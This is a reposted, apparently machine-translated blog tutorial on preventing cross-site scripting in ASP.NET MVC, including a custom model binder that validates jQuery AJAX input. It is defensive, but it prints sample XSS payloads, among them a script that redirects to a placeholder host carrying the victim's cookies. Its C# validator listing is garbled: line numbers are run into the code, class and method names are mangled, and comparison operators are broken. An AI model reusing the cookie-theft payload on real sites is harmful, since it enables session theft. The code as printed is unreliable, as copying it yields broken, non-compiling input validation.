Web Security (1): cross-site scripting (XSS) and security-related xss

Web Security (1): cross-site scripting (XSS) and security-related xss

Introduction
Cross-Site Scripting (XSS) attacks are not abbreviated to Cascading Style Sheet (CSS). Therefore, XSS attacks are abbreviated to Cross-Site Scripting (XSS) attacks. A malicious attacker inserts malicious Script code into a Web page. When a user browses this page, the Script code embedded in the Web is executed, so as to achieve the Special Purpose of malicious attacks, for example, attackers can obtain users' cookies, navigate to malicious websites, and carry Trojans.

Some scenarios

1. A malicious attacker can insert malicious code into his personal profile. When other users access his personal information, they will execute malicious code.
2. Malicious attackers can post an article, take an eye-catching title, and insert malicious code into the content. Then, when users view this article, they will execute malicious code.
3. Malicious attackers insert malicious code into replies or messages in some popular articles or posts. When a user browses his reply or messages, malicious code is executed.

Prevent two phases of XSS

1. When data is submitted, data is verified. If malicious scripts are contained, data is not allowed to enter the database. ASP. net mvc performs this verification by default. For example, if you try to insert a malicious script, you will get an HttpRequestValidationException. Note: The method in the red box in Figure 2 will be mentioned later.

Figure 1

Figure 2

If you want to allow the script to be imported into the database, you can add [ValidateInput (false)] to the corresponding Action. At this time, malicious scripts cannot generate threats, because there is another stage of prevention measures.

Figure 3

Figure 4

2. When outputting data, the output content is HTML encoded, and malicious scripts are not executed. In addition, the Razor Syntax of MVC uses HTML encoding by default. However, if we use Html. Raw () to output the content, malicious scripts will generate a threat.

Figure 5

Figure 6

Malicious scripts

1. Simple pop-up window or content display.
<Script> alert ('you are hacked! ') </Script>
 
2. Navigate to a malicious website. Note: Here we only use the Baidu website as a navigation demonstration. It does not mean that the Baidu website is a malicious website.
<Script> window. location. href = 'HTTP: // www.baidu.com '; </script>
 
3. obtain cookies.
<Script> alert (document. cookie) </script>
<Script> window. location. href = 'HTTP: // www.example.com? Cookies = document. cookies'; </script>

$. Is the ajax data verification invalid?

We assume that we do not allow data containing malicious scripts to be imported into the database, but we use jquey's ajax for interaction.

Figure 7

Figure 8

Figure 9

Figure 10

The data is still in the database. Why? Let's study the method in the red box 2.

Figure 11

Figure 12

From figure 12, I guess MVC will verify the above Content in the Request, but the jquery ajax data exists in the Content of the Request. Therefore, the default verification does not work for jquery ajax.

$. Ajax data verification implementation

To perform data verification on $. ajax, I will start with ModelBinder. The Code is as follows:

1 public class charge: defamodelmodelbinder 2 {3 protected override bool charge (ControllerContext controllerContext, ModelBindingContext bindingContext, PropertyDescriptor propertyDescriptor, object value) 4 {5 var contentType = controllerContext. httpContext. request. contentType; 6 7 if (contentType. equals ("application/json", StringComparison. ordinalIgnoreCase) & 8 value is String & 9 controllerContext. controller. validateRequest & 10 bindingContext. propertyMetadata [propertyDescriptor. name]. requestValidationEnabled) 11 {12 if (IsDangerousString (value. toString () 13 {14 throw new HttpRequestValidationException ("potentially dangerous value detected in the request! "); 15} 16} 17 18 return base. onPropertyValidating (controllerContext, bindingContext, propertyDescriptor, value); 19} 20 21 /// <summary> 22 // Refer the method "System. web. crossSiteScriptingValidation. isDangerousString ". 23 // </summary> 24 private static bool IsDangerousString (string str) 25 {26 var startingChars = new [] {'<','&'}; 27 var startIndex = 0; 28 29 while (true) 30 {31 var index = str. inde XOfAny (startingChars, startIndex); 32 33 if (index <0) 34 {35 return false; 36} 37 38 if (index = (str. length-1) 39 {40 return false; 41} 42 43 var ch = str [index]; 44 45 if (ch! = '&') 46 {47 if (ch = '<') & (IsAtoZ (str [index + 1]) | (str [index + 1] = '! ') | (Str [index + 1] ='/') | (str [index + 1] = '? ') 48 {49 return true; 50} 51} 52 53 else if (str [index + 1] =' # ') 54 {55 return true; 56} 57 58 startIndex = index + 1; 59} 60} 61 62 private static bool IsAtoZ (char c) 63 {64 return (c> = 'A ') & (c <= 'Z') | (c> = 'A') & (c <= 'Z'); 65} 66}

Then register AjaxModelBinder in Global. asax. cs.

Figure 13

Then, malicious scripts will be detected when the input data has malicious scripts.

 

Figure 14

I copied the IsDangerousString method in AjaxModelBinder from the. Net source code.

 

Figure 15

AntiXSS third-party components

If you use. Net4.0 or a later version, you do not need to introduce AntiXSS because. Net 4.0 has integrated AntiXSS. If it is another version, you need to introduce it.

Source code download

For ease of use, I did not use any database, but used a file to store data. After the code is downloaded, it can be run directly without configuration.

: Https://github.com/ErikXu/XSS

　　

 

Article Reprinted from: http://www.cnblogs.com/Erik_Xu/p/5403773.html